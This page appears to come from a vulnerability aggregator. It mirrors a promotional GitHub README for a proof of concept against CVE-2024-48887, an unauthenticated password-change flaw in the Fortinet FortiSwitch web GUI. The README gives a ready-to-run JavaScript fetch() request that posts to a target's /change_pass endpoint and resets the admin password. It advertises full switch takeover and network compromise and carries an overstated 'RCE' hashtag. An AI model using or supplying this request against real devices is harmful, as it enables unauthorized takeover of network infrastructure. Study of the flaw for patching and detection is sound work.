CVE-2024-48887 PoC — Fortinet FortiSwitch 安全漏洞

Source

https://github.com/cybersecplayground/CVE-2024-48887-FortiSwitch-Exploit

Associated Vulnerability

Title:Fortinet FortiSwitch 安全漏洞 (CVE-2024-48887)
Description:A unverified password change vulnerability in Fortinet FortiSwitch GUI may allow a remote unauthenticated attacker to change admin passwords via a specially crafted request

Description

a lightweight JavaScript snippet showcasing how unauthorized password changes can be triggered on vulnerable Fortinet FortiSwitch GUI endpoints.

Readme

# CVE-2024-48887-FortiSwitch-Exploit
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨

🔥 Just dropped a lightweight JavaScript snippet showcasing how unauthorized password changes can be triggered on vulnerable Fortinet FortiSwitch GUI endpoints.

🛠️ About the Vulnerability:
An attacker can craft a simple fetch() request to manipulate password settings without any auth, directly targeting /change_pass endpoint variants.

```
fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));
```
💡 Impact: Full switch takeover, lateral movement potential, and network compromise.

📁 Repo: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit
⭐ Star the repo & share it with your infosec folks!

📢 Follow the full breakdown and real-time alerts via @cybersecplayground

#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!